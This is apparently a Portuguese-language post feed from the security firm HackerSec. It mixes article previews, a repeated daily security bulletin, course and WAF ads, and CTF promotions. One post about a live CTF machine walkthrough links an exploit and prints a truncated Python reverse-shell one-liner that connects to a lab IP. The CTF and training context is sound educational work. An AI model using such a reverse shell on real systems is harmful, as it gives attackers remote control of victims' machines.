Realizando ataque de phishing com Android
https://hackersec.com/realizando-ataque-de-phishing-com-android/
https://hackersec.com/realizando-ataque-de-phishing-com-android/
HackerSec
Realizando ataque de phishing com Android - HackerSec
Nesse artigo vamos aprender como realizar um ataque de phishing no Android. Mas para quem não sabe, phishing é a tentativa fraudulenta de obter informações confidenciais como nomes de usuário, senhas e detalhes de cartão de crédito, por meio de disfarce de…
Como usar o terminal do Linux no Android
https://hackersec.com/como-usar-o-terminal-do-linux-no-android/
https://hackersec.com/como-usar-o-terminal-do-linux-no-android/
HackerSec
Como usar o terminal do Linux no Android - HackerSec
Para você que não sabe o Android é baseado em Linux, logo o Termux é um aplicativo para Android e também um emulador de terminal Linux, pode ser usado para executar comandos Linux via linha de comando que aprimoram tarefas no seu Android. E o mais interessante…
Laboratórios para prática de Pentest e CTF
https://hackersec.com/laboratorios-para-pratica-de-pentest-e-ctf/
https://hackersec.com/laboratorios-para-pratica-de-pentest-e-ctf/
HackerSec
Laboratórios para prática de Pentest e CTF - HackerSec
Há alguns anos atrás práticar o que aprendíamos sobre hacking/cibersegurança/pentest não era uma tarefa tão facil, pois não existiam ambientes ou laboratórios que simulassem sistemas vulneráveis. Logo os profissionais ou estudantes que passaram por esta época…
BOLETIM DIÁRIO DE CIBERSEGURANÇA
* Presidente da Microsoft afirma que ataque hacker foi o maior que o mundo já viu.
O presidente da Microsoft, Brad Smith, afirmou que o ataque à SolarWinds, empresa de infraestrutura de informação, foi o “maior e mais sofisticado ataque que o mundo já viu”. A gigante da tecnologia foi uma das 18 mil empresas afetadas pela ação. As companhias que usavam o software de monitoramento de rede Orion podem ter sido vítimas do ataque.
* Navegadores baseados em Chromium, como Microsoft Edge e Google Chrome, em breve oferecerão suporte ao recurso de segurança Intel CET para prevenir uma ampla gama de vulnerabilidades.
O recurso CET foi projetado para proteger programas contra ataques de Programação Orientada a Retorno (ROP) e Programação Orientada a Saltos (JOP) que modificam o fluxo normal de um aplicativo para que o código malicioso de um invasor seja executado em seu lugar.
* Vulnerabilidade no VMware vSphere Replication pode facilitar ataques a empresas.
A VMware disse aos clientes que várias versões do produto são afetadas por uma vulnerabilidade de injeção de comando de alta gravidade (importante) que pode ser explorada por um hacker com privilégios de administrador para executar comandos shell no sistema subjacente.
* Presidente da Microsoft afirma que ataque hacker foi o maior que o mundo já viu.
O presidente da Microsoft, Brad Smith, afirmou que o ataque à SolarWinds, empresa de infraestrutura de informação, foi o “maior e mais sofisticado ataque que o mundo já viu”. A gigante da tecnologia foi uma das 18 mil empresas afetadas pela ação. As companhias que usavam o software de monitoramento de rede Orion podem ter sido vítimas do ataque.
* Navegadores baseados em Chromium, como Microsoft Edge e Google Chrome, em breve oferecerão suporte ao recurso de segurança Intel CET para prevenir uma ampla gama de vulnerabilidades.
O recurso CET foi projetado para proteger programas contra ataques de Programação Orientada a Retorno (ROP) e Programação Orientada a Saltos (JOP) que modificam o fluxo normal de um aplicativo para que o código malicioso de um invasor seja executado em seu lugar.
* Vulnerabilidade no VMware vSphere Replication pode facilitar ataques a empresas.
A VMware disse aos clientes que várias versões do produto são afetadas por uma vulnerabilidade de injeção de comando de alta gravidade (importante) que pode ser explorada por um hacker com privilégios de administrador para executar comandos shell no sistema subjacente.
Para receber todos os dias, acompanhe em nosso LinkedIn: https://www.linkedin.com/company/hackersec/
Linkedin
HackerSec | LinkedIn
HackerSec | 134,142 followers on LinkedIn. Advanced Offensive Cybersecurity |
HackerSec is a Brazilian cybersecurity company, founded in 2011 and headquartered in São Paulo, Brazil. It is the leading national reference in cybersecurity, delivering top-tier…
HackerSec is a Brazilian cybersecurity company, founded in 2011 and headquartered in São Paulo, Brazil. It is the leading national reference in cybersecurity, delivering top-tier…
Como proteger seu site contra cibercriminosos
https://hackersec.com/como-proteger-seu-site-contra-hackers/
https://hackersec.com/como-proteger-seu-site-contra-hackers/
HackerSec
Como proteger seu site contra cibercriminosos - HackerSec
O alto crescimento das aplicações web fazem com que os cibercriminosos busquem falhas e vulnerabilidades em sites, principalmente os que armazenam dados de clientes como os e-commerce e demais serviços. Grandes sites e plataformas como redes sociais já sofreram…
Se você ainda não sabe jogar CTF, veja essa nossa playlist com dicas: https://youtube.com/playlist?list=PLdcoARew9jpgerz17A_hdS5pALLqRKs_0
YouTube
Resolvendo desafios do CTF da HackerSec
Share your videos with friends, family, and the world
Conheça nossa Formação em Cibersegurança: https://hackersec.com/treinamentos/formacao-em-ciberseguranca/
Parcele em até 12x no boleto ou 10x no cartão!
Parcele em até 12x no boleto ou 10x no cartão!
HackerSec
Curso de Formação em Cibersegurança
Seja um profissional de cibersegurança completo, com a Formação da HackerSec você aprenderá do básico ao avançado para ingressar no mercado.
Hoje é dia de LIVE com Resolução de Máquina e Atualização do CTF!
Defina o lembrete: https://youtu.be/IyB9f90SalM
Defina o lembrete: https://youtu.be/IyB9f90SalM
YouTube
Resolvendo Máquina "Monitoring" do CTF - HackerSec
Exploit utilizado: https://www.exploit-db.com/exploits/47204
Shell utilizada na live:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.30.0.46",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); …
Shell utilizada na live:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.30.0.46",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); …
Único CTF nacional com diversas máquinas, desafios e mais de 25 mil jogadores!
https://capturetheflag.com.br/
https://capturetheflag.com.br/
Uma boa playlist para quem está começando jogar CTF
https://youtube.com/playlist?list=PLdcoARew9jpgerz17A_hdS5pALLqRKs_0
https://youtube.com/playlist?list=PLdcoARew9jpgerz17A_hdS5pALLqRKs_0
YouTube
Resolvendo desafios do CTF da HackerSec
Share your videos with friends, family, and the world
Lançamos uma nova atualização em nosso WAF que conta com novos recursos.
Aproveite para proteger sua aplicação web: https://waf.hackersec.com/
Aproveite para proteger sua aplicação web: https://waf.hackersec.com/
HackerSec
Web Application Firewall - WAF - HackerSec
Proteja seu site contra hackers, invasores, malwares e ataques com o melhor Firewall do mercado. Web Application Firewall WAF para seu site.